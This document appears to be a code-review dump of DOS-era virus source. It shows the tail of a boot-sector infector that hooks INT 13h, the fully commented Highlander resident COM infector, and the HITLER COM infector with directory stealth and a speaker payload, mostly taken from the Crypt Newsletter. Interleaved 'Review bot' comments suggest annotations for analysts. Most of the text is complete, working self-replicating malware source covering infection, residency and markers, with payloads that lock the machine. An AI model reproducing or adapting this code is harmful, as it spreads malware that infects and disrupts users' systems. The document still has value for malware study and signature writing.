pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0003h
mov dx,0100h
a13: mov ax,0201h
iv13: jmp v13
wcheck: cmp ah,03h
jnz v13
cmp dl,00h
jnz v13
push ax
push bx
push cx
push dx
push ds
push es
push di
push cs
pop es
mov bx,0300h
mov cx,0001h
xor dx,dx
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz iflopd
mov cx,0003h
mov dx,0100h
mov bx,0300h
call hdwrit
mov bx,0100h
xor dx,dx
mov cx,0001h
call hdwrit
iflopd: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
v13: db 0eah
int13 dd 0h
drive db 0h
bigj dd 0h
boot dd 0h
code ends
end main
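Review bot: No line in this file carries a comment, and `TITLE FILE UTIL` misdescribes it, so anyone triaging the sample has to trace every instruction to learn what it is. A header comment is needed, for example `; Boot-sector sample: lowers the BIOS memory word at 0:0413h by 2 (KB), copies 0400h bytes of itself to that segment, repoints INT 13h (0:004Ch/004Eh) to nint13`. The `cmp ds:[0304h],'iH'` test and the two `cmp es:[si],'iH'` tests should be annotated `; 'Hi' from the id string = sector already carries the sample`, since that appears to be the marker an analyst would match on. It is also worth noting beside `nint13: cmp di,'rv'` that the `'rv'` value in DI is how the handler recognises the sample's own disk calls and passes them straight to the saved vector.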
@@ -0,0 +1,422 @@
;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
version:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
push ax ;store all registers subject to change
push bx
push cx
push es
push si
push di
push dx
push ds
push cs ;store the code segment so it can be used
push cs ;to set the ds and es registers
pop ds ;set ds to same as cs
pop es ;set es to same as cs
mov dx,080h ;set dx to offset 080h
mov ah,01ah ;set ah to create DTA
int 21h ;create DTA at 080h (normal DTA area)
pop ds ;set ds to original ds
pop dx ;set dx to original dx (ds:dx is used to
;point to the path and filename of the
;program to be executed)
push dx ;store these values back
push ds
xor cx,cx ;zero cx
mov ah,04eh ;set ah to search for filename match
int 21h ;search for filename (this is primarily
;done to setup data in the DTA so that it
;can be checked easier than making a
;number of individual calls)
push es ;store es (same as cs)
pop ds ;set ds to same as es and cs
cmp [byte 087h],'D' ;check for 'D' as seventh letter in file
jne j5
jmp endvirus ;if 'D' is 7th letter, dont infect
j5:
mov si,offset data3+0100h ;set source of bytes to compare
mov di,089h ;set destination of bytes to compare
mov cx,3 ;number of bytes to compare
cld ;compare forward
repe cmpsb ;compare bytes (check to see if file's
;extension is COM)
je j1
jmp endvirus ;not a COM file. Dont infect
j1:
mov bx,[word 009ah] ;set bx to length of file
cmp bx,1024 ;is length > 1024?
jae j2 ;yes, continue with checks
jmp endvirus ;no, dont infect
j2:
cmp bx,62000 ;is length < 62000?
jbe j3 ;yes, continue with checks
jmp endvirus ;no, dont infect
j3:
mov ax,[word 096h] ;set ax to file's time stamp
and ax,0000000000011111b ;clear everything but seconds
cmp ax,0000000000010100b ;is seconds = 40?
jne j4 ;yes, continue with infection
mov ah,02ah ;no, set ah to get the date
int 21h ;get current system date
mov cx,21 ;set cx to 21
cmp dl,29 ;is the date the 29th?
je irritate ;yes, continue with irritate
jmp endvirus ;no, let program execute normally
irritate:
mov dx,offset data5+0100h ;point dx to irritating message
mov ah,09h ;set ah to write to screen
int 21h ;write message 21 times
loop irritate
iret ;xfer program control to whatever's on
;the stack (this almost guarantee's a
;lockup and a reboot)
j4:
mov ax,[word 096h] ;set ax equal to the file's time stamp
and ax,1111111111100000b ;zero the seconds portion
or ax,0000000000010100b ;set the seconds = 40
add bx,0100h ;set bx = loc for restore routine (end
;of file once its in memory)
mov [word data1+0100h],bx ;store this value in the virus
mov bx,ax ;set bx = to adjusted time stamp
pop ds ;get the original ds
push ds ;store this value back
mov ax,04300h ;set ax to get the file's attributes
;ds:dx already points to path/filename
int 21h ;get the files attributes
push cx ;push the attributes
push bx ;push the adjusted time stamp
xor cx,cx ;zero cx(attributes for normal, read/write)
mov ax,04301h ;set ax to set file attributes
int 21h ;set files attributes to normal/read/write
mov ax,03d02h ;set ax to open file
int 21h ;open file for read/write access
mov bx,ax ;mov file handle to bx
push cs ;push current code segment
pop ds ;and pop into ds (ds=cs)
mov cx,endcode-begin ;set cx equal to length of virus
mov dx,offset endcode+0100h ;point dx to end of virus in memory
mov ah,03fh ;set ah to read from file
int 21h ;read bytes from beginning of file and
;store at end of virus. Read as many bytes
;as virus is long.
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04200h ;set ax to move file pointer from begin
int 21h ;mov file pointer to start of file
mov cx,endcode-begin ;set cx = length of virus
mov dx,0100h ;point dx to start of virus
mov ah,040h ;set ah to write to file
int 21h ;write virus to start of file
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04202h ;set ax to move file pointer from end
int 21h ;mov file pointer to end of file
mov cx,checkinfect-restcode ;set cx to length of restore routine
mov dx,offset restcode+0100h ;point dx to start of restore routine
mov ah,040h ;set ah to write to file
int 21h ;write restore routine to end of file
mov cx,endcode-begin ;set cx to length of virus (length of code
;read from beginning of file)
mov dx,offset endcode+0100h ;point dx to data read from file
mov ah,040h ;set ah to write to file
int 21h ;write data read from start of file to end
;of file following restore routine
pop cx ;pop the adjusted time stamp
mov dx,[word 098h] ;mov the file date stamp into dx
mov ax,05701h ;set ax to write time/date stamp
int 21h ;write time/date stamp to file
mov ah,03eh ;set ah to close file
int 21h ;close the file
pop cx ;pop the original attributes
pop ds ;pop the original ds
pop dx ;pop the original dx
push dx ;push these values back
push ds
mov ax,04301h ;set ax to set file attributes (ds:dx now
;points to original path/filename)
int 21h ;set the original attributes back to file
endvirus: ;virus execution complete. restore original
;values for INT 21 function
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
cont: ;virus complete. restore original flags
popf
pushf
int21trap: ;this calls the original INT 21 routine
db 09ah ;opcode for a far call
nop ;blank area. the original INT 21 vector
nop ;is copied to this area
nop
nop
push ax ;after the original INT 21 routine has
;completed execution, control is returned
;to this point
push bx
pushf ;push the flags returned from the INT 21
;routine. We have to get them in the
;proper location in the stack when we
;return to the calling program
pop ax ;pop the flags
mov bx,sp ;set bx equal to the stack pointer
mov [word ss:bx+8],ax ;copy the flags to the proper location in
;the stack
pop bx ;restore bx
pop ax ;restore ax
iret ;return to calling program
signature:
db 'dex'
endcode: ;this file has been written as if it were
;a natural infection. At this point the
;virus is ended and we are at the restore
;routine. Following this is the host code
;which will be moved back to 0100h. This
;file could never actually be a natural
;infection however due to its small size
rep movsb ;start of restore routine. move host back
push cs ;set up to xfer to cs:0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;host is restored. xfer to start of host
hoststart: ;This is the host program. It consists
;merely of a simple message being displayed
jmp skipdata ;jump over message
hostmessage:
db 'The virus is now resident.$'
skipdata:
mov ah,09h ;set ah to write to screen
mov dx,offset hostmessage+0100h
;point dx to message to display
int 21h ;display message
mov ah,04ch ;set ah to terminate program
int 21h ;terminate program, return to DOS
END
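Review bot: The yes/no comments on the infection-marker test are inverted relative to the branch. After `cmp ax,0000000000010100b ;is seconds = 40?`, the `jne j4` line is taken when the stamp does not match yet is annotated "yes", and the fall-through `mov ah,02ah` (marker present) is annotated "no". They should read `jne j4 ;no, not marked - continue with infection` and `mov ah,02ah ;yes, already marked - get the date`. For anyone writing a check against this marker it is also worth stating beside the mask that the stored field value is 20, because the DOS time stamp keeps seconds divided by two. Separately, the header calls this "version 1.0" while the embedded `version` string is `'v05'`; a short comment saying which one identifies the build would avoid confusion when comparing samples.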
@@ -0,0 +1,718 @@
;The HITLER virus: commented in a rough 'n' ready way by the
;Crypt Newsletter staff for issue #11, January 1993.
;The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.
call rakett ; recalculate offset
old db 'Í !­' ; virus identification marker
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh ; check if virus installed
int 21h
jnc failed ; exit if here
cli
mov ax,3521h
int 21h ; get interrupt vector
mov w [bp+offset old21],bx ; es:bx points to
mov w [bp+offset old21+2],es ; interrupt handler
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx ; access timer tick int.
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380 ; stuff our value into
sti ; "teller" buffer for
; later
call normalspeed ; eh?
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21 ; set int 21 route through virus
int 21h
mov al,1Ch
mov dx,offset ni1C ; revector timer tick through
int 21h ; virus
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret ; exit to host
findFCB: popf
call int21 ; look to virus "stealth"
pushf ; routine, now that int 21
or al,al ; comes through virus
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax ; the following essentially massages the
push bx ; file control block on directory scans,
push dx ; subtracting the virus size from infected
push es ; files before the user sees 'em
mov ah,2Fh ; get disk transfer address
call int21 ;
cmp byte es:[bx],0FFh ; failed?
jne normFCB ; no, everything still OK
add bx,8
normFCB: mov al,byte es:[bx+16h] ; retrieve seconds attribute
and al,31 ; from observed file, if it's
xor al,31 ; 31, the file is infected
jnz shitFCB ; not 31 - file not infected
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size ; subtract virus length from
sbb dx,0 ; infected file
jc shitFCB ; no files? exit
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB: ; restore everything as normal
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h ; any user access of the file control
je findFCB ; block must come through virus
cmp ah,12h ; ditto for here
je findFCB
cmp ax,42ABh ;
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h ; is a program being loaded?
jne not_4B00 ; exit if not
call install_24 ; install critical error handler
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h ; get file attributes of potential host
call int21
jc back1 ; failed? exit
mov cs:old_attr,cx ; stash attributes here
test cl,4 ; is the potential host a system file?
jnz back1 ; yes? so exit
mov ax,4301h ; set new file attributes, read or write
xor cx,cx
call int21
jc back1 ; error? exit
push dx
push ds
call infect ; begin infection stuff
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24 ; normalize critical error handler
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h ; open host file with read/write access
call int21
jnc okay_open
bad1: ret ; was there an error? exit
okay_open: xchg bx,ax
mov ax,5700h ; get file date and file time
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh ; read first five bytes from potential host
mov cx,5
mov dx,offset old ; store them here
push cs
pop ds
call int21
jc close ; error, exit?
cmp al,5 ; get the five bytes?
jne close ; no, so exit
cmp word old[0],'MZ' ; is this an .EXE file?
je close ; yes, so go away
cmp word old[0],'ZM' ; double-check, is this an .EXE file?
je close ; yes, so go away
cmp old[0],0E9h ; does it start with a jump?
jne infect1 ; no - infect!
cmp word old[3],'­!' ; does it start with the HITLER virus
jne infect1 ; marker? If no, infect!
; (Boy, this fellow is careful!)
close: pop dx
pop cx
mov ax,5701h ; reset file date and time
call int21
mov ah,3Eh ; close file
call int21
ret
infect1: mov ax,4202h ; reset pointer to end of file
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000 ; compare .COMfile size to 59,000 bytes
jae close ; greater than or equal? close file
; HITLER is a big virus, so we don't want to
dec ax ; exceed the DOS execution boundary for .COM
dec ax ; files
dec ax
mov word ptr putjmp[1],ax
mov ah,40h ; write HITLER to the target file
mov cx,size ; length in CX
mov dx,100h
call int21
jc close
cmp ax,size ; again, we're being real careful
jne close ; not to infect ourself
mov ax,4200h ; set file pointer to beginning of host
xor cx,cx
xor dx,dx
call int21
mov ah,40h ; write the first five bytes of the
mov cx,5 ; viral jump and ID strings to the
mov dx,offset putjmp ; beginning of the host file
call int21
or byte ss:[bp],31 ; set the seconds field to 31, so the
; "stealth" routine has its cue
jmp close ; close the file and clean up
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf ; installation of critical error
cli ; handler (no shit, Sherlock!)
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf ; remove it
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0 ; ID note by Dreamer of Demoralized
; Youth
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380 ; "new" timer tick values for viral
; trigger
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
; -lobotomize code from here to marker to get HITLER at start
cmp teller,0 ; compare 0 with the value the virus
je teller_ok ; stuffed into the timer tick interrupt
dec teller ; if equal - do "HITLER!" thing, if not
jmp noreset ; decrement the value
; -bottom of lobotomy marker
teller_ok: ; sound routine to the IBM internal speaker
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample ; points to the huge table at
jb noreset ; the end of the virus, a
mov xofs,offset sample ; .VOC sample of some nut
noreset: ; shouting "HITLER!"
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
